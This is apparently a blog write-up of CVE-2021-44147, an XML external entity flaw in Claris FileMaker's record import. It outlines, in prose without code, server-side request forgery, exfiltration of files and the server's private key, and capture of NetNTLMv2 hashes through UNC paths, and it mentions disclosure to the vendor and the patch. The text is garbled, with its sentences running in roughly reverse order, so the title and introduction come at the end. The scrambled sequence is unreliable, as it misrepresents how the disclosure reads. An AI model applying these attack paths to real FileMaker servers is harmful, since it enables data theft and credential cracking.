In the last example, we eventually explore the scenario where we initiate a SMB connection to capture the NetNTLMv2 hash. In the second and third example, we will steal the private key of the FileMaker Server in-band and out-of-band, respectively. In the first example we will make a request to a private host by uploading a crafted XLSX file. The proof-of-concepts below demonstrate this with a fmp12 file hosted via WebDirect. When the FileMaker Server is runnning under a custom Windows user, it is also possible to utilize UNC paths in external entities, make the user connect to a share and through that steal and potentially crack the NetNTLMv2 hash to reveal the user’s password. The XML parser used to parse XML files (including XLSX) during import (“Import Records” action) does not prevent the use of external entities which allows an attacker to perform HTTP requests to arbitrary hosts, including internal ones, and in addition allows reading and exfiltrating the contents of arbitrary files, given they can be transported via a HTTP GET or included within a XML document without further encoding. and this write-up was only released after a patch was available (see timeline below). The issue was privately disclosed to Claris, Inc. If you’re running FileMaker Server, make sure to install patch 19.4.1 to mitigate this attack vector. The following is a description of the vulnerability including potential exploitation paths. The vulnerability is/was indeed there and can lead to local file disclosure and server side request forgery in various components of the FileMaker platform. CVE-2021-44147: XML External Entity Vulnerability in Claris FileMakerĪ couple of months ago I looked more deeply into the “Import Records” functionality in FileMaker, especially the XML parsing, and was wondering if any XXE vulnerability may exist and how one could exploit this in technically interesting ways.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |